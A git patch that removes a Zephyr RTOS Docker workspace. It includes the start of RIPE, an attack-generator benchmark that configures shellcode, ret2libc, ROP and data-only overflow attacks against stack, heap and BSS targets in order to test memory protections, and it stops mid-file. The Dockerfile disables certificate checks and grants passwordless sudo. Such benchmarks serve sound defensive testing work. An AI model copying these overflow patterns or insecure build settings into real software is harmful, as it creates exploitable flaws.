From 00522c5152687a064f3965d5e25182b13b629b4a Mon Sep 17 00:00:00 2001 From: sjthales Date: Wed, 29 Nov 2023 10:01:41 +0100 Subject: [PATCH] remove zephyr directory --- zephyr-docker/Dockerfile | 174 --- zephyr-docker/LICENSE | 202 --- .../workspace/perf_baseline/CMakeLists.txt | 22 - .../workspace/perf_baseline/prj.conf | 9 - .../workspace/perf_baseline/src/funclib.c | 64 - .../workspace/perf_baseline/src/funclib.h | 26 - .../workspace/perf_baseline/src/testapp.c | 105 -- zephyr-docker/workspace/ripe/CMakeLists.txt | 15 - zephyr-docker/workspace/ripe/prj.conf | 8 - zephyr-docker/workspace/ripe/sample.yaml | 8 - .../ripe/src/ripe_attack_generator.c | 1309 ----------------- .../ripe/src/ripe_attack_generator.h | 189 --- .../ripe/src/ripe_attack_parameters.h | 70 - zephyr-docker/workspace/ripe/src/setjmp.S | 63 - zephyr-docker/workspace/ripe/src/setjmp.h | 26 - 15 files changed, 2290 deletions(-) delete mode 100644 zephyr-docker/Dockerfile delete mode 100644 zephyr-docker/LICENSE delete mode 100644 zephyr-docker/workspace/perf_baseline/CMakeLists.txt delete mode 100644 zephyr-docker/workspace/perf_baseline/prj.conf delete mode 100644 zephyr-docker/workspace/perf_baseline/src/funclib.c delete mode 100644 zephyr-docker/workspace/perf_baseline/src/funclib.h delete mode 100644 zephyr-docker/workspace/perf_baseline/src/testapp.c delete mode 100644 zephyr-docker/workspace/ripe/CMakeLists.txt delete mode 100644 zephyr-docker/workspace/ripe/prj.conf delete mode 100644 zephyr-docker/workspace/ripe/sample.yaml delete mode 100644 zephyr-docker/workspace/ripe/src/ripe_attack_generator.c delete mode 100644 zephyr-docker/workspace/ripe/src/ripe_attack_generator.h delete mode 100644 zephyr-docker/workspace/ripe/src/ripe_attack_parameters.h delete mode 100644 zephyr-docker/workspace/ripe/src/setjmp.S delete mode 100644 zephyr-docker/workspace/ripe/src/setjmp.h diff --git a/zephyr-docker/Dockerfile b/zephyr-docker/Dockerfile deleted file mode 100644 index ac657f313..000000000 --- a/zephyr-docker/Dockerfile +++ /dev/null @@ -1,174 +0,0 @@ -FROM ubuntu:20.04 - -ARG ZSDK_VERSION=0.15.1 -ARG DOXYGEN_VERSION=1.9.4 -ARG CMAKE_VERSION=3.20.5 -ARG WGET_ARGS="-q --show-progress --progress=bar:force:noscroll --no-check-certificate" - -ARG UID=1000 -ARG GID=1000 - -# Set default shell during Docker image build to bash -SHELL ["/bin/bash", "-c"] - -# Set non-interactive frontend for apt-get to skip any user confirmations -ENV DEBIAN_FRONTEND=noninteractive - -# Install base packages -RUN apt-get -y update && \ - apt-get -y upgrade && \ - apt-get install --no-install-recommends -y \ - software-properties-common \ - lsb-release \ - autoconf \ - automake \ - bison \ - build-essential \ - ca-certificates \ - ccache \ - chrpath \ - cpio \ - device-tree-compiler \ - dfu-util \ - diffstat \ - dos2unix \ - doxygen \ - file \ - flex \ - g++ \ - gawk \ - gcc \ - gcovr \ - git \ - git-core \ - gnupg \ - gperf \ - gtk-sharp2 \ - help2man \ - iproute2 \ - lcov \ - libglib2.0-dev \ - libftdi1-dev \ - libgtk2.0-0 \ - liblocale-gettext-perl \ - libncurses5-dev \ - libpcap-dev \ - libpopt0 \ - libsdl1.2-dev \ - libsdl2-dev \ - libssl-dev \ - libtool \ - libtool-bin \ - libusb-1.0-0-dev \ - locales \ - make \ - net-tools \ - ninja-build \ - openssh-client \ - pkg-config \ - python3-dev \ - python3-pip \ - python3-ply \ - python3-setuptools \ - python-is-python3 \ - qemu \ - rsync \ - socat \ - srecord \ - sudo \ - texinfo \ - udev \ - unzip \ - usbutils \ - valgrind \ - vim \ - wget \ - ovmf \ - xz-utils - -# Install rule for udev to access HS2 cable -RUN echo "ATTRS{idVendor}==\"0403\", ATTRS{idProduct}==\"6014\", MODE=\"660\", GROUP=\"plugdev\", TAG+=\"uaccess\"" > /etc/udev/rules.d/60-openocd.rules - -# Install multi-lib gcc (x86 only) -RUN if [ "${HOSTTYPE}" = "x86_64" ]; then \ - apt-get install --no-install-recommends -y \ - gcc-multilib \ - g++-multilib \ - ; fi - -# Install i386 packages (x86 only) -RUN if [ "${HOSTTYPE}" = "x86_64" ]; then \ - dpkg --add-architecture i386 && \ - apt-get -y update && \ - apt-get -y upgrade && \ - apt-get install --no-install-recommends -y \ - libsdl2-dev:i386 \ - ; fi - -# Initialise system locale -RUN locale-gen en_US.UTF-8 -ENV LANG=en_US.UTF-8 -ENV LANGUAGE=en_US:en -ENV LC_ALL=en_US.UTF-8 - -# Install Doxygen (x86 only) -# NOTE: Pre-built Doxygen binaries are only available for x86_64 host. -RUN if [ "${HOSTTYPE}" = "x86_64" ]; then \ - wget ${WGET_ARGS} https://downloads.sourceforge.net/project/doxygen/rel-${DOXYGEN_VERSION}/doxygen-${DOXYGEN_VERSION}.linux.bin.tar.gz && \ - tar xf doxygen-${DOXYGEN_VERSION}.linux.bin.tar.gz -C /opt && \ - ln -s /opt/doxygen-${DOXYGEN_VERSION}/bin/doxygen /usr/local/bin && \ - rm doxygen-${DOXYGEN_VERSION}.linux.bin.tar.gz \ - ; fi - -# Install CMake -RUN wget ${WGET_ARGS} https://github.com/Kitware/CMake/releases/download/v${CMAKE_VERSION}/cmake-${CMAKE_VERSION}-Linux-${HOSTTYPE}.sh && \ - chmod +x cmake-${CMAKE_VERSION}-Linux-${HOSTTYPE}.sh && \ - ./cmake-${CMAKE_VERSION}-Linux-${HOSTTYPE}.sh --skip-license --prefix=/usr/local && \ - rm -f ./cmake-${CMAKE_VERSION}-Linux-${HOSTTYPE}.sh - -# Install Python dependencies -RUN pip3 install wheel pip -U &&\ - pip3 install -r https://raw.githubusercontent.com/zephyrproject-rtos/zephyr/master/scripts/requirements.txt && \ - pip3 install -r https://raw.githubusercontent.com/zephyrproject-rtos/mcuboot/master/scripts/requirements.txt && \ - pip3 install west &&\ - pip3 install sh &&\ - pip3 install awscli PyGithub junitparser pylint \ - statistics numpy \ - imgtool \ - protobuf \ - GitPython - -# Install Zephyr SDK -RUN mkdir -p /opt/toolchains && \ - cd /opt/toolchains && \ - wget ${WGET_ARGS} https://github.com/zephyrproject-rtos/sdk-ng/releases/download/v${ZSDK_VERSION}/zephyr-sdk-${ZSDK_VERSION}_linux-${HOSTTYPE}.tar.gz && \ - tar xf zephyr-sdk-${ZSDK_VERSION}_linux-${HOSTTYPE}.tar.gz && \ - zephyr-sdk-${ZSDK_VERSION}/setup.sh -t all -h -c && \ - rm zephyr-sdk-${ZSDK_VERSION}_linux-${HOSTTYPE}.tar.gz - -# Clean up stale packages -RUN apt-get clean -y && \ - apt-get autoremove --purge -y && \ - rm -rf /var/lib/apt/lists/* - -# Create 'user' account -RUN groupadd -g $GID -o user - -RUN useradd -u $UID -m -g user -G plugdev user \ - && echo 'user ALL = NOPASSWD: ALL' > /etc/sudoers.d/user \ - && chmod 0440 /etc/sudoers.d/user - -# Run the Zephyr SDK setup script as 'user' in order to ensure that the -# `Zephyr-sdk` CMake package is located in the package registry under the -# user's home directory. -USER user - -RUN sudo -E -- bash -c ' \ - /opt/toolchains/zephyr-sdk-${ZSDK_VERSION}/setup.sh -c && \ - chown -R user:user /home/user/.cmake \ - ' - -# Set the locale -ENV ZEPHYR_TOOLCHAIN_VARIANT=zephyr -ENV PKG_CONFIG_PATH=/usr/lib/i386-linux-gnu/pkgconfig -ENV OVMF_FD_PATH=/usr/share/ovmf/OVMF.fd diff --git a/zephyr-docker/LICENSE b/zephyr-docker/LICENSE deleted file mode 100644 index 8f71f43fe..000000000 --- a/zephyr-docker/LICENSE +++ /dev/null @@ -1,202 +0,0 @@ - Apache License - Version 2.0, January 2004 - http://www.apache.org/licenses/ - - TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION - - 1. Definitions. - - "License" shall mean the terms and conditions for use, reproduction, - and distribution as defined by Sections 1 through 9 of this document. - - "Licensor" shall mean the copyright owner or entity authorized by - the copyright owner that is granting the License. - - "Legal Entity" shall mean the union of the acting entity and all - other entities that control, are controlled by, or are under common - control with that entity. For the purposes of this definition, - "control" means (i) the power, direct or indirect, to cause the - direction or management of such entity, whether by contract or - otherwise, or (ii) ownership of fifty percent (50%) or more of the - outstanding shares, or (iii) beneficial ownership of such entity. - - "You" (or "Your") shall mean an individual or Legal Entity - exercising permissions granted by this License. - - "Source" form shall mean the preferred form for making modifications, - including but not limited to software source code, documentation - source, and configuration files. - - "Object" form shall mean any form resulting from mechanical - transformation or translation of a Source form, including but - not limited to compiled object code, generated documentation, - and conversions to other media types. - - "Work" shall mean the work of authorship, whether in Source or - Object form, made available under the License, as indicated by a - copyright notice that is included in or attached to the work - (an example is provided in the Appendix below). - - "Derivative Works" shall mean any work, whether in Source or Object - form, that is based on (or derived from) the Work and for which the - editorial revisions, annotations, elaborations, or other modifications - represent, as a whole, an original work of authorship. For the purposes - of this License, Derivative Works shall not include works that remain - separable from, or merely link (or bind by name) to the interfaces of, - the Work and Derivative Works thereof. - - "Contribution" shall mean any work of authorship, including - the original version of the Work and any modifications or additions - to that Work or Derivative Works thereof, that is intentionally - submitted to Licensor for inclusion in the Work by the copyright owner - or by an individual or Legal Entity authorized to submit on behalf of - the copyright owner. For the purposes of this definition, "submitted" - means any form of electronic, verbal, or written communication sent - to the Licensor or its representatives, including but not limited to - communication on electronic mailing lists, source code control systems, - and issue tracking systems that are managed by, or on behalf of, the - Licensor for the purpose of discussing and improving the Work, but - excluding communication that is conspicuously marked or otherwise - designated in writing by the copyright owner as "Not a Contribution." - - "Contributor" shall mean Licensor and any individual or Legal Entity - on behalf of whom a Contribution has been received by Licensor and - subsequently incorporated within the Work. - - 2. Grant of Copyright License. Subject to the terms and conditions of - this License, each Contributor hereby grants to You a perpetual, - worldwide, non-exclusive, no-charge, royalty-free, irrevocable - copyright license to reproduce, prepare Derivative Works of, - publicly display, publicly perform, sublicense, and distribute the - Work and such Derivative Works in Source or Object form. - - 3. Grant of Patent License. Subject to the terms and conditions of - this License, each Contributor hereby grants to You a perpetual, - worldwide, non-exclusive, no-charge, royalty-free, irrevocable - (except as stated in this section) patent license to make, have made, - use, offer to sell, sell, import, and otherwise transfer the Work, - where such license applies only to those patent claims licensable - by such Contributor that are necessarily infringed by their - Contribution(s) alone or by combination of their Contribution(s) - with the Work to which such Contribution(s) was submitted. If You - institute patent litigation against any entity (including a - cross-claim or counterclaim in a lawsuit) alleging that the Work - or a Contribution incorporated within the Work constitutes direct - or contributory patent infringement, then any patent licenses - granted to You under this License for that Work shall terminate - as of the date such litigation is filed. - - 4. Redistribution. You may reproduce and distribute copies of the - Work or Derivative Works thereof in any medium, with or without - modifications, and in Source or Object form, provided that You - meet the following conditions: - - (a) You must give any other recipients of the Work or - Derivative Works a copy of this License; and - - (b) You must cause any modified files to carry prominent notices - stating that You changed the files; and - - (c) You must retain, in the Source form of any Derivative Works - that You distribute, all copyright, patent, trademark, and - attribution notices from the Source form of the Work, - excluding those notices that do not pertain to any part of - the Derivative Works; and - - (d) If the Work includes a "NOTICE" text file as part of its - distribution, then any Derivative Works that You distribute must - include a readable copy of the attribution notices contained - within such NOTICE file, excluding those notices that do not - pertain to any part of the Derivative Works, in at least one - of the following places: within a NOTICE text file distributed - as part of the Derivative Works; within the Source form or - documentation, if provided along with the Derivative Works; or, - within a display generated by the Derivative Works, if and - wherever such third-party notices normally appear. The contents - of the NOTICE file are for informational purposes only and - do not modify the License. You may add Your own attribution - notices within Derivative Works that You distribute, alongside - or as an addendum to the NOTICE text from the Work, provided - that such additional attribution notices cannot be construed - as modifying the License. - - You may add Your own copyright statement to Your modifications and - may provide additional or different license terms and conditions - for use, reproduction, or distribution of Your modifications, or - for any such Derivative Works as a whole, provided Your use, - reproduction, and distribution of the Work otherwise complies with - the conditions stated in this License. - - 5. Submission of Contributions. Unless You explicitly state otherwise, - any Contribution intentionally submitted for inclusion in the Work - by You to the Licensor shall be under the terms and conditions of - this License, without any additional terms or conditions. - Notwithstanding the above, nothing herein shall supersede or modify - the terms of any separate license agreement you may have executed - with Licensor regarding such Contributions. - - 6. Trademarks. This License does not grant permission to use the trade - names, trademarks, service marks, or product names of the Licensor, - except as required for reasonable and customary use in describing the - origin of the Work and reproducing the content of the NOTICE file. - - 7. Disclaimer of Warranty. Unless required by applicable law or - agreed to in writing, Licensor provides the Work (and each - Contributor provides its Contributions) on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or - implied, including, without limitation, any warranties or conditions - of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A - PARTICULAR PURPOSE. You are solely responsible for determining the - appropriateness of using or redistributing the Work and assume any - risks associated with Your exercise of permissions under this License. - - 8. Limitation of Liability. In no event and under no legal theory, - whether in tort (including negligence), contract, or otherwise, - unless required by applicable law (such as deliberate and grossly - negligent acts) or agreed to in writing, shall any Contributor be - liable to You for damages, including any direct, indirect, special, - incidental, or consequential damages of any character arising as a - result of this License or out of the use or inability to use the - Work (including but not limited to damages for loss of goodwill, - work stoppage, computer failure or malfunction, or any and all - other commercial damages or losses), even if such Contributor - has been advised of the possibility of such damages. - - 9. Accepting Warranty or Additional Liability. While redistributing - the Work or Derivative Works thereof, You may choose to offer, - and charge a fee for, acceptance of support, warranty, indemnity, - or other liability obligations and/or rights consistent with this - License. However, in accepting such obligations, You may act only - on Your own behalf and on Your sole responsibility, not on behalf - of any other Contributor, and only if You agree to indemnify, - defend, and hold each Contributor harmless for any liability - incurred by, or claims asserted against, such Contributor by reason - of your accepting any such warranty or additional liability. - - END OF TERMS AND CONDITIONS - - APPENDIX: How to apply the Apache License to your work. - - To apply the Apache License to your work, attach the following - boilerplate notice, with the fields enclosed by brackets "{}" - replaced with your own identifying information. (Don't include - the brackets!) The text should be enclosed in the appropriate - comment syntax for the file format. We also recommend that a - file or class name and description of purpose be included on the - same "printed page" as the copyright notice for easier - identification within third-party archives. - - Copyright {yyyy} {name of copyright owner} - - Licensed under the Apache License, Version 2.0 (the "License"); - you may not use this file except in compliance with the License. - You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - - Unless required by applicable law or agreed to in writing, software - distributed under the License is distributed on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - See the License for the specific language governing permissions and - limitations under the License. - diff --git a/zephyr-docker/workspace/perf_baseline/CMakeLists.txt b/zephyr-docker/workspace/perf_baseline/CMakeLists.txt deleted file mode 100644 index 96658f873..000000000 --- a/zephyr-docker/workspace/perf_baseline/CMakeLists.txt +++ /dev/null @@ -1,22 +0,0 @@ -# SPDX-License-Identifier: Apache-2.0 - -cmake_minimum_required(VERSION 3.20.0) - -find_package(Zephyr REQUIRED HINTS $ENV{ZEPHYR_BASE}) - -# Override standard Microsemi UART adressing with the on from Future Electronics -#set(DTC_OVERLAY_FILE ${CMAKE_CURRENT_LIST_DIR}/src/ripe.dts) - -# include($ENV{ZEPHYR_BASE}/cmake/app/boilerplate.cmake NO_POLICY_SCOPE) -#project(hello_world C ASM) -project(perf_baseline) - -# No shared library in Zephyr -add_library(funclib STATIC ${CMAKE_CURRENT_SOURCE_DIR}/src/funclib.c ) -target_include_directories(funclib PRIVATE ${CMAKE_CURRENT_SOURCE_DIR}/src ) -target_compile_options(funclib PRIVATE "-o0" ) - -target_sources(app PRIVATE ${CMAKE_CURRENT_SOURCE_DIR}/src/testapp.c ) -target_link_libraries(app PRIVATE funclib) -target_include_directories(app PRIVATE ${CMAKE_CURRENT_SOURCE_DIR}/src ) -target_compile_options(app PRIVATE "-o0" ) diff --git a/zephyr-docker/workspace/perf_baseline/prj.conf b/zephyr-docker/workspace/perf_baseline/prj.conf deleted file mode 100644 index f51e09e82..000000000 --- a/zephyr-docker/workspace/perf_baseline/prj.conf +++ /dev/null @@ -1,9 +0,0 @@ -CONFIG_MAIN_STACK_SIZE=4096 -CONFIG_IDLE_STACK_SIZE=1024 -CONFIG_ISR_STACK_SIZE=4096 -CONFIG_INIT_STACKS=y -CONFIG_NEWLIB_LIBC=y -CONFIG_DEBUG=y -CONFIG_SIZE_OPTIMIZATIONS=n -CONFIG_DEBUG_OPTIMIZATIONS=y -CONFIG_NEWLIB_LIBC_FLOAT_PRINTF=y diff --git a/zephyr-docker/workspace/perf_baseline/src/funclib.c b/zephyr-docker/workspace/perf_baseline/src/funclib.c deleted file mode 100644 index 0626922f5..000000000 --- a/zephyr-docker/workspace/perf_baseline/src/funclib.c +++ /dev/null @@ -1,64 +0,0 @@ -#include - -double func1(double arg1){ - double ratio = 1.25; - double thresold = 1.0; - double val = arg1; - double min = 10000.0; - int i; - - if (val < min) val = min; - - for ( i = 0; i < 1000; i++){ - val = val / ratio; - if (val < thresold) - break; - val = val + 1.5; - } - - return (double)i; -} - -double func2(double arg1){ - double ratio = 1.25; - double thresold = 10000.0; - double val = arg1; - double max = 10.0; - int i; - - if (val > max) val = max; - - for (i = 0; i < 1000; i++){ - val = val * ratio; - if (val > thresold) break; - val = val - 1.5; - } - - return (double)i; -} - -double func3(double arg1){ - double val = arg1; - - val = func1(val); - val = func2(val); - - return val; -} - -// Syracuse -double func4(double arg) { - int val = arg; - int i = 0; - while (val != 1) { - if (val%2) { - // odd - val = 3*val+1; - } else { - val /= 2; - } - i++; - } - return (double)i; -} - diff --git a/zephyr-docker/workspace/perf_baseline/src/funclib.h b/zephyr-docker/workspace/perf_baseline/src/funclib.h deleted file mode 100644 index d9c44dc86..000000000 --- a/zephyr-docker/workspace/perf_baseline/src/funclib.h +++ /dev/null @@ -1,26 +0,0 @@ -#ifndef _TESTAPP_FUNC_LIB_ -#define _TESTAPP_FUNC_LIB_ - -#include - -#define FUNCTION_NUMBER 4 - -double func1(double arg1); - -double func2(double arg1); - -double func3(double arg1); -double func4(double arg1); - -typedef double(*pdfunc)(double); - -typedef struct { - uint8_t buffer[sizeof(double)]; - pdfunc pfunc; -} buff_ptr_t; - -typedef pdfunc dfunctable_t[FUNCTION_NUMBER]; - -static dfunctable_t ftable = {func1, func2, func3, func4}; - -#endif diff --git a/zephyr-docker/workspace/perf_baseline/src/testapp.c b/zephyr-docker/workspace/perf_baseline/src/testapp.c deleted file mode 100644 index 2b678ad5b..000000000 --- a/zephyr-docker/workspace/perf_baseline/src/testapp.c +++ /dev/null @@ -1,105 +0,0 @@ -#include -#include -#include - -#define MAX_DEPTH 100 -#define MAX_CALLS 10000 - -#define FREQ 25000000.0 - -double main_func(double, int); -double main_func_rec(double, int, int); - - -static int depth = 0; -static int callsnb = 0; - -inline uint64_t get_mcycle() { - uint64_t mcycle = 0; - __asm__ volatile ("csrr %0,mcycle" : "=r" (mcycle) ); - return mcycle; -} - -void main(void) -{ - // definitions used for measuring execution time - uint64_t start, end; - uint64_t total_cycles; - - // arguments - depth = 12; - callsnb = 50; - double value = 63728127; - double sum = 0.0; - - // sanity checks - if ((1 > depth) || (MAX_DEPTH < depth)){ - fprintf(stderr,"ERROR: specified depth (%d) is out of allowed range (1-%d)\n", depth, MAX_DEPTH); - exit(1); - } - if ((1 > callsnb) || (MAX_CALLS < callsnb)){ - fprintf(stderr,"ERROR: specified call number (%d) is out of allowed range (1-%d)\n", callsnb, MAX_CALLS); - exit(1); - } - - fprintf(stdout,"Begining of execution with depth %d, call number %d, seed value %f\n", depth, callsnb, value); - - start = get_mcycle(); - - // main computation loop - for (int i = 0; i < callsnb; i++) - sum += main_func_rec(value, 0, 1); - - end = get_mcycle(); - total_cycles = end - start; - - fprintf(stdout,"SUCCESS: computed value %f - duration: %f sec %u cycles\n", sum, total_cycles/FREQ, total_cycles); -} - - -double main_func_rec(double value, int first_func_call, int curdepth){ - // allocation on stack, trigger canaries - buff_ptr_t buff_ptr; - *((double*)buff_ptr.buffer) = 0.0; - - // recusive calls, as to create deep stack - if (curdepth < depth){ - *((double*)buff_ptr.buffer) += main_func_rec(value, ((first_func_call+1)%FUNCTION_NUMBER), curdepth+1); - } - - double tmp = main_func(value, first_func_call); - - *((double*)buff_ptr.buffer) += tmp; - - return *((double*)buff_ptr.buffer); -} - - -double main_func(double value, int first_func_call){ - int cur_index; - buff_ptr_t* heap_mem = NULL; - double res = 0.0; - - // allocate a buffer + fonction pointer on heap, will test heap memory protection such as heap canaries - heap_mem = (buff_ptr_t*)malloc(sizeof(buff_ptr_t)); - *((double*)heap_mem->buffer) = 0.0; - - - for (int i = 0; i < FUNCTION_NUMBER; i++){ - // hopefully this trick bypasses compiler optimization - cur_index = (first_func_call + i) % FUNCTION_NUMBER; - - // should cause an indirect jump, triggering forward-edge CFI - heap_mem->pfunc = ftable[cur_index]; - - //res += ftable[cur_index](value); - - // writing in buffer preceding a pointer should lead to a canary - *((double*)heap_mem->buffer) += heap_mem->pfunc(value); - } - res = *((double*)heap_mem->buffer); - - free(heap_mem); - - return res; -} diff --git a/zephyr-docker/workspace/ripe/CMakeLists.txt b/zephyr-docker/workspace/ripe/CMakeLists.txt deleted file mode 100644 index f1fb70862..000000000 --- a/zephyr-docker/workspace/ripe/CMakeLists.txt +++ /dev/null @@ -1,15 +0,0 @@ -# SPDX-License-Identifier: Apache-2.0 - -cmake_minimum_required(VERSION 3.20.0) - -find_package(Zephyr REQUIRED HINTS $ENV{ZEPHYR_BASE}) - -# Override standard Microsemi UART adressing with the on from Future Electronics -#set(DTC_OVERLAY_FILE ${CMAKE_CURRENT_LIST_DIR}/src/ripe.dts) - -# include($ENV{ZEPHYR_BASE}/cmake/app/boilerplate.cmake NO_POLICY_SCOPE) -#project(hello_world C ASM) -project(ripe) - -#target_sources(app PRIVATE src/ripe_attack_generator.c src/setjmp.S ) -target_sources(app PRIVATE src/ripe_attack_generator.c ) diff --git a/zephyr-docker/workspace/ripe/prj.conf b/zephyr-docker/workspace/ripe/prj.conf deleted file mode 100644 index 5d72ac9bb..000000000 --- a/zephyr-docker/workspace/ripe/prj.conf +++ /dev/null @@ -1,8 +0,0 @@ -CONFIG_MAIN_STACK_SIZE=4096 -CONFIG_IDLE_STACK_SIZE=1024 -CONFIG_ISR_STACK_SIZE=4096 -CONFIG_INIT_STACKS=y -CONFIG_NEWLIB_LIBC=y -CONFIG_DEBUG=y -CONFIG_SIZE_OPTIMIZATIONS=n -CONFIG_DEBUG_OPTIMIZATIONS=y diff --git a/zephyr-docker/workspace/ripe/sample.yaml b/zephyr-docker/workspace/ripe/sample.yaml deleted file mode 100644 index d94dfbbcc..000000000 --- a/zephyr-docker/workspace/ripe/sample.yaml +++ /dev/null @@ -1,8 +0,0 @@ -sample: - description: Running the RIPE test - name: ripe -common: - tags: introduction - harness: console - harness_config: - type: one_line diff --git a/zephyr-docker/workspace/ripe/src/ripe_attack_generator.c b/zephyr-docker/workspace/ripe/src/ripe_attack_generator.c deleted file mode 100644 index 86ca6dfce..000000000 --- a/zephyr-docker/workspace/ripe/src/ripe_attack_generator.c +++ /dev/null @@ -1,1309 +0,0 @@ -/* - * Standalone RISC-V compatible implementation of RIPE - * - * Attack params: - * -------------- - * technique = direct, indirect - * inject parameter = ret2libc, shellcode injection, ROP, data only - * code pointer = return address, function pointer, vulnerable struct, longjmp buffer, - * non-control data variable - * location = stack, heap, data, bss - * function = memcpy, strcpy, strncpy, strcat, strncat, sprintf, snprintf, - * sscanf, homebrew memcpy - */ - -#include "ripe_attack_generator.h" - -static boolean output_debug_info = TRUE; - -// JM: shellcode is generated in perform_attack() -char * shellcode_nonop[12]; - -// JM: data-only target pointer -uint32_t dop_dest = 0xdeadbeef; - -// Do not count for the null terminator since a null in the shellcode will -// terminate any string function in the standard library -static size_t size_shellcode_nonop = 12; - -/* DATA SEGMENT TARGETS */ -/* -Vulnerable struct -Overflow buffers (buffer1 for .data, buffer2 for .sdata) -Arbitrary read data -DOP flag -Two general pointers for indirect attack -Function pointers -Longjmp buffer -*/ -static struct attackme data_struct = { "AAAA", &dummy_function }; -static char data_buffer1[256] = "d"; -static char data_buffer2[8] = "dummy"; -static char data_secret[32] = "success. Secret data leaked.\n"; -static int data_flag = 0700; -static uint32_t * data_mem_ptr_aux[64] = { &dummy_function }; -static uint32_t * data_mem_ptr[64] = { &dummy_function }; -static int (* data_func_ptr)(const char *) = &dummy_function; -static jmp_buf data_jmp_buffer = { 1 }; - -// JM: control data destinations -void -shellcode_target(); -void -ret2libc_target(); -void -rop_target(); -void -dop_target(char * buf, uint32_t auth); - -// JM: contains buffer lower in memory than stack param, allowing for overflow -void -set_low_buf(char ** buf); - -// JM: integer overflow vulnerability -void -iof(char * buf, uint32_t iv); - -// JM: arbitrary read bug -void -data_leak(char *buf); - -// JM: forces length param to register and jumps before return for stack param attacks -void -homebrew_memcpy_param(void * dst, const void * src, register size_t length); - -// JM: longjmp() is called from here -void -lj_func(jmp_buf lj_buf); - -// get ret address -// JM: ra written to stack one word higher than bp -#define OLD_BP_PTR __builtin_frame_address(0) -#define RET_ADDR_PTR ((void **) OLD_BP_PTR - 1) - -static ATTACK_FORM attack; - -void -try_attack(void) -{ - jmp_buf stack_jmp_buffer_param; - - // Check if attack is possible - if (is_attack_possible()) { - perform_attack(&dummy_function, stack_jmp_buffer_param); - } else { - exit(ATTACK_IMPOSSIBLE); - } - -} - -void -print_current_test_parameters(void) { - printk("RIPE parameters:\n"); - printk("technique\t%s\n" - "inject param\t%s\n" - "code pointer\t%s\n" - "location\t%s\n" - "function\t%s\n", - opt_techniques[attack.technique-100], - opt_inject_params[attack.inject_param-200], - opt_code_ptrs[attack.code_ptr-300], - opt_locations[attack.location-400], - opt_funcs[attack.function-500]); -} - -// -// Initial main taking argument on the commande line has been replaced by a simple function call -// You have to update the ATTACK_NR to mimic the command line arguments -// -void -main(void) -{ -#define ATTACK_NR 1 -#if ATTACK_NR == 1 - attack.technique = DIRECT; - attack.inject_param = INJECTED_CODE_NO_NOP; - attack.code_ptr= RET_ADDR; - attack.location = STACK; - attack.function = MEMCPY; - -#elif ATTACK_NR == 2 - attack.technique = DIRECT; - attack.inject_param = INJECTED_CODE_NO_NOP; - attack.code_ptr= FUNC_PTR_STACK_VAR; - attack.location = STACK; - attack.function = MEMCPY; - -#elif ATTACK_NR == 3 - attack.technique = INDIRECT; - attack.inject_param = INJECTED_CODE_NO_NOP; - attack.code_ptr= FUNC_PTR_STACK_VAR; - attack.location = STACK; - attack.function = MEMCPY; - -#elif ATTACK_NR == 4 - attack.technique = DIRECT; - attack.inject_param = DATA_ONLY; - attack.code_ptr= VAR_LEAK; - attack.location = HEAP; - attack.function = SPRINTF; - -#elif ATTACK_NR == 5 - attack.technique = DIRECT; - attack.inject_param = RETURN_INTO_LIBC; - attack.code_ptr= RET_ADDR; - attack.location = STACK; - attack.function = MEMCPY; - -#elif ATTACK_NR == 6 - attack.technique = INDIRECT; - attack.inject_param = RETURN_INTO_LIBC; - attack.code_ptr= FUNC_PTR_HEAP; - attack.location = HEAP; - attack.function = MEMCPY; - -#elif ATTACK_NR == 7 - attack.technique = INDIRECT; - attack.inject_param = RETURN_INTO_LIBC; - attack.code_ptr= STRUCT_FUNC_PTR_HEAP; - attack.location = HEAP; - attack.function = HOMEBREW; - -#elif ATTACK_NR == 8 - attack.technique = INDIRECT; - attack.inject_param = RETURN_INTO_LIBC; - attack.code_ptr= LONGJMP_BUF_HEAP; - attack.location = HEAP; - attack.function = MEMCPY; - -#elif ATTACK_NR == 9 - attack.technique = DIRECT; - attack.inject_param = RETURN_ORIENTED_PROGRAMMING; - attack.code_ptr= RET_ADDR; - attack.location = STACK; - attack.function = MEMCPY; - -#elif ATTACK_NR == 10 - attack.technique = DIRECT; - attack.inject_param = RETURN_ORIENTED_PROGRAMMING; - attack.code_ptr= STRUCT_FUNC_PTR_HEAP; - attack.location = HEAP; - attack.function = SPRINTF; - -#endif - - printk("RIPE is alive! %s\n", CONFIG_BOARD); - print_current_test_parameters(); - try_attack(); - - printf("Unexpected back in main\n"); - return 0; - -} - -/********************/ -/* PERFORM_ATTACK() */ -/********************/ -void -perform_attack( - int (*stack_func_ptr_param)(const char *), - jmp_buf stack_jmp_buffer_param) -{ - jmp_buf stack_jmp_buffer; - - /* STACK TARGETS */ - /* - Function Pointer - Two general pointers for indirect attack - DOP flag - Arbitrary read data - Overflow buffer - Vulnerable struct - */ - int (* stack_func_ptr)(const char *); - long * stack_mem_ptr; - long * stack_mem_ptr_aux; - int stack_flag; - char stack_secret[32]; - strcpy(stack_secret, data_secret); - char stack_buffer[1024]; - struct attackme stack_struct; - stack_struct.func_ptr = &dummy_function; - - /* HEAP TARGETS */ - /* - Vulnerable struct - Overflow buffers - DOP flag - Two general pointers for indirect attack - Arbitrary read data - Function pointer array - Longjmp buffer - */ - struct attackme * heap_struct = - (struct attackme *) malloc(sizeof(struct attackme)); - heap_struct->func_ptr = dummy_function; - - /* Two buffers declared to be able to chose buffer that gets allocated */ - /* first on the heap. The other buffer will be set as a target, i.e. a */ - /* heap array of function pointers. */ - char * heap_buffer1 = (char *) malloc(256 + sizeof(long)); - char * heap_buffer2 = (char *) malloc(256 + sizeof(long)); - char * heap_buffer3 = (char *) malloc(256 + sizeof(long)); - - int * heap_flag = (int *) malloc(sizeof(int *)); - long * heap_mem_ptr_aux; - long * heap_mem_ptr; - char * heap_secret; - int(**heap_func_ptr)(const char *) = 0; - jmp_buf * heap_jmp_buffer; - - /* BSS TARGETS */ - /* - Function pointer - DOP flag - Two general pointers for indirect attack - Arbitrary read data - Overflow buffer - Longjmp buffer - Vulnerable Struct - */ - static int (* bss_func_ptr)(const char *); - static int * bss_flag; - static long * bss_mem_ptr_aux; - static long * bss_mem_ptr; - static char bss_secret[32]; - static char bss_buffer[256]; - static jmp_buf bss_jmp_buffer; - static struct attackme bss_struct; - - /* Pointer to buffer to overflow */ - char * 